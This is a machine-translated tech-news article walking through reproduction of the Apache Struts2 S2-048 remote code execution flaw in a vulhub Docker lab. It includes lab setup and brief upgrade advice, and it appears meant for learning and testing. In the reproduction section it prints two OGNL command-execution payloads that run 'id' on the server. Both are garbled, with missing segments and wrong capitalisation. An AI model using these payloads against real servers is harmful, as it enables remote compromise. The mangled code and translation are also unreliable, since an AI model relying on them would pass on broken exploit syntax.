Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to reproduce vulnerabilities in Apache Struts2--048 remote code execution. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Introduction to 0x00

The Struts2 framework is an open source web application architecture for developing Java EE web applications. It leverages and extends Java Servlet API to encourage developers to adopt the MVC architecture. Struts2 takes the excellent design idea of WebWork as the core, absorbs some of the advantages of Struts framework, and provides a cleaner Web application framework for the implementation of MVC design patterns.

Overview of 0x01 vulnerabilities

Apache Struts2 2.3.x series enables the struts2-struts1-plugin plug-in and exists the struts2-showcase directory. The vulnerability is caused by arbitrary code execution due to improper processing of subsequent data splicing and transmission when ActionMessage receives parameter data that can be controlled by the customer.

0x02 scope of influence

The version of the struts2-struts1-plugin plug-in is enabled in the Apache Struts 2.3.x series.

0x03 environment building

1. It is complicated to build Apache Struts2 by yourself. This vulnerability environment is built using docker environment in vulhub.

Download address: https://github.com/vulhub/vulhub

two。 After the download is completed, decompress it into the S2-048 directory and start the vulnerability environment.

Cd cd vulhub-master/struts2/s2-048 / enter the directory

Docker-compose up-d / / start the shooting range

3. Use docker ps to see if the startup is successful

4. Type http:your-ip:8080/hello.action in the browser and see that the following page environment has been built

Recurrence of 0x04 vulnerabilities

1. Enter the following link in the browser to access the vulnerability page

Http://192.168.3.160:8080/integration/saveGangster.action

two。 Enter ${1q1} in the first form "Gangster Name", enter it at will, and click submit submit to see the OGNL expression executed.

two。 At Gangster Name ", change ${1q1} to the payload statement executed by the following command

% {(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). (# context.setMemberAccess (# dm). .commons.io.IOUtils @ toString (@ java.lang.Runtime@getRuntime (). Exec ('id'). GetInputStream ()). (# Q)}

3. You can also use Burp to grab the package to modify the payload statement executed by the command

Note: URL encoding is required for payload

% {(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# _ memberAccess? (# _ memberAccess=#dm): (# container=#context ['com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.getExcludedPackageNames (). Clear ()). (# ognlUtil.getExcludedClasses (). Clear ()). (# context.setMemberAccess (# dm). (# cmd='id') . (# iswin= (@ java.lang.System@getProperty ('os.name'). ToLowerCase (). Contains (' win'). (# cmds= (# iswin? {'cmd.exe') (# p=new java.lang.ProcessBuilder (# cmds)). (# p.redirectErrorStream (true)). (# process=#p.start ()). (# ros= (@ org.apache.struts2.ServletActionContext@getResponse (). GetOutputStream (). (@ org.apache.commons.io.IOUtils@copy (# process.getInputStream (), # ros)). (# ros.flush ())}

4. It can be implemented using automated scripts or graphical tools, and there is no demonstration here.

The tool can be searched and downloaded on GitHub

0x05 repair recommendation

1. Upgrade recommended upgrade to the latest version

2. Disable closing (deleting)\ struts-2.3.x\ apps\ struts2-showcase.war packages according to the business situation.

The above is the editor for you to share how to carry out Apache Struts2--048 remote code execution vulnerabilities are repeated, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.